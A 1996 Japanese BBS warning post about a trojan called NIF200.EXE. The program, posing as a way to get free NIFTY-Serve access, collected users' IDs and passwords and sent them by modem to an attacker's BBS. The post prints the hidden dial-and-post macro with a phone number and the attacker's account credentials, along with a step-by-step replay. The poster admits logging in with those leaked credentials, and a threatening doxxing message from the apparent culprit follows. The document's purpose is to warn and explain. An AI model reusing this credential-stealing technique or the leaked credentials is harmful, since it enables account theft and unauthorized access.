#22 Article 2898 Posted at 1996/09/29 13:05:10 by バビル (MAP6780) []

Subject: ハッキング

INTERNET上でNIFのIDとPASSWORDのハッキング事件が起きて話題になっています。
犯人はこのNETの会員MAP6780ではないかという疑いがかかっています。
このNETのライブラリ機能を悪用しているという話です。
その事件に関する文章を掲載しますのでみなさんも気をつけてください。
MAP6780に対する処置はシステム管理者の判断に任せます。
今回のアクセスは事件の犯人と思われるMAP6780の情報を逆ハックした人物が公
開したこのNETのIDとPASSWORDでおこなっています。GUESTのIDでは書き込めなか
ったため仕方ありません。
このNETの信用に関わる問題です。
========================================================================
最初に掲載されたハッキングを知らせる文
========================================================================
みなさん気をつけて下さい!!!

ニフティサーブの課金がタダになるというプログラムを
ご存じですか?

そのプログラムを起動すると,最初にニフティの
IDとパスワードの入力を求めてきます。

その後,モデムが動き出し,なにやらコソコソやっています。
メッセージは
      nifty課金システムの裏口を探しています。
そして,その後,
      発見しました。
で,終了しています。

このプログラムのからくりは,以下の通りです。

1.あるBBS(ニフティでは無い)に自動的に接続します。
2.あらかじめ登録してあるIDとパスワードで自動的にログインします。
3.そのBBSの中の「個人データ登録サービス」へ移動します。
4.最初に貴方が入力したニフティのIDとパスワードを自動的に書き込みま
す。
5.終了し,回線を切断します。

その後,このプログラムを作った人が,通信ソフトを使い,
そのBBSに正式にアクセスし,登録されているIDと
パスワードを盗んでいるのでしょう。

このプログラムはDOS上(DOS窓)から起動されますので
通信ソフトとは違い,接続したBBSの文字は一切表示されないのです。
この方法で,他人のIDとパスワードを使い,タダでニフティにアクセスするこ
とが出来るのです。

ということはニフティの課金がタダになるどころか,
全く知らない人に貴方のIDとパスワードを教えることになり,
知らない間に課金がどんどん増えてしまうのです。

引っかかった人はすぐにニフティのパスワードを変更した方が
良いと思います。
========================================================================
その後被害者からの問い合わせに答えた文章
========================================================================
以下は、上記掲示を読んで、本当にニフティが無料になるというのは嘘なのかを
疑問に思っている人がいたので、詳しく書きました。
もちろん、この疑問に思っている人も、ニフティが無料になるといわれているプ
ログラムを
入手しているそうです。


なんか問題になっているようなので、詳しく書きます。
新たな被害者が出ないようにとの配慮です。お許し下さい。

------------------------------------------------------------------------
-----------------------------------
プログラムの紹介(ニフティのIDとパスワードを盗む犯人の手口)
*このプログラムの入手先は
LAZERさんのホームページです

もしかしてLAZERさんが犯人????

------------------------------------------------------------------------
-----------------------------------
ニフティが無料になるプログラムを(DOS上で)実行すると以下のような処理
が行われます。

@これからniftyの課金を無効にする処理をします。
@リターンキーを押して下さい。

@IDとパスワードを入力してください。

@IDを半角で入力してください。
@ID = ABC01234     <-------------------- 貴方のニフティのIDを入
れる

@IDは上記で正しいですか?(Y/N)

@パスワードを半角で入力してください。
@PASS = #1234567     <-------------------- 貴方のニフティのパスワー
ドを入れる

@パスワードは上記で正しいですか?(Y/N)

ATDT0356844833MAP6780babil7890    <----------------- 電話をかけ、BBS
にログインしている(DOS画面上では見えない)
++++++++++++++=======*********  <----------------- このマークに注目
(下記の解説で詳細を書いています)

@nifty課金システムの裏口を探しています。
9531               <----------------- BBSのメニューを
移動している(たどり着く場所は、個人書き込みスペース)
^^^^
@発見しました!
test.w///q            <----------------- 「test」という
名前(タイトル)で入力開始状態にし、
^^^^^^^^^^                         最初に入力されたニ
フティのIDとパスワードを変数から出力し
                           「.]で書き込みを
終了し、
                                 「w]で書き込みを
確定し、
                           「/」「/」「/」
でTOPメニューへ移動し、
                           「q」でログアウト
している。

------------------------------------------------------------------------
-----------------------------------
解説
------------------------------------------------------------------------
-----------------------------------
上記内容でDOS上に表示されているのは@マークの文字のみです。
通信に詳しい人なら、もう分かると思いますが、マクロのようなプログラムで
す。(自動的に行きたいところへ行って何かをする)


++++ が 犯人がニフティのIDを盗むのに使っている(運営しているかも?)
BBSの電話番号です
==== が  犯人のIDです
**** が 犯人のパスワードです

もし、このプログラム(NIF200.EXE)を持っている人がいたら、バイ
ナリ表示が出来るエディタ等を利用して
NIF200.EXEを表示してみて下さい。
最後の方に上記プログラムらしきものが書かれています。


------------------------------------------------------------------------
-----------------------------------
実験
------------------------------------------------------------------------
-----------------------------------
WTERMやその他の通信ソフトを使い、この怪しいBBSにアクセスしてみ
る。
方法は以下の通り

(1) ATDT0356844833(BBSの電話番号)
(2) MAP6780(ID)
(3) babil7890(パスワード)
(4) 9(ライブラリ)
(5) 5(プログラム/データ/個人スペースの登録)
(6) 3(個人スペース)
(7) 1(テキストファイルの登録)
(8) test(別にどんなタイトルでも良い)
(9)  abc12345(どんなファイル名でもよい)
(10)  なにか適当に書く
(11) .
(12) w
(13) /
(14) /
(15) /
(16) q

どうでしょうか、これでニフティがタダになるわけがないとわかります。
それどころか、この犯人にまんまとIDとパスワードを教えることになるので
す。
========================================================================
次は犯人からこのハッキングの手口を公開した人物への警告(脅し)
========================================================================
タイトル :09/27 21:57へ警告!!!

EMAIL: LAZERと言えば誰かわかるだろう

そのぐらいにしておけ!
これ以上やるとお前のIDを公開する!
いくら匿名で載せてもお前のIDをルートをたどって調べる事ぐらい簡単だ。
(今、すでに調査に入っている)
かなりの確率でプロバイダはvegaだというところまではわかっている。
載せれば載せただけ特定がやりやすくなるのを忘れるな!
特定できるのも時間の問題だ。
今度同じような文章を載せたときはただではおかないからな!
------------------------------------------------------------------------
-----------------------------------
------------------------------------------------------------------------
-----------------------------------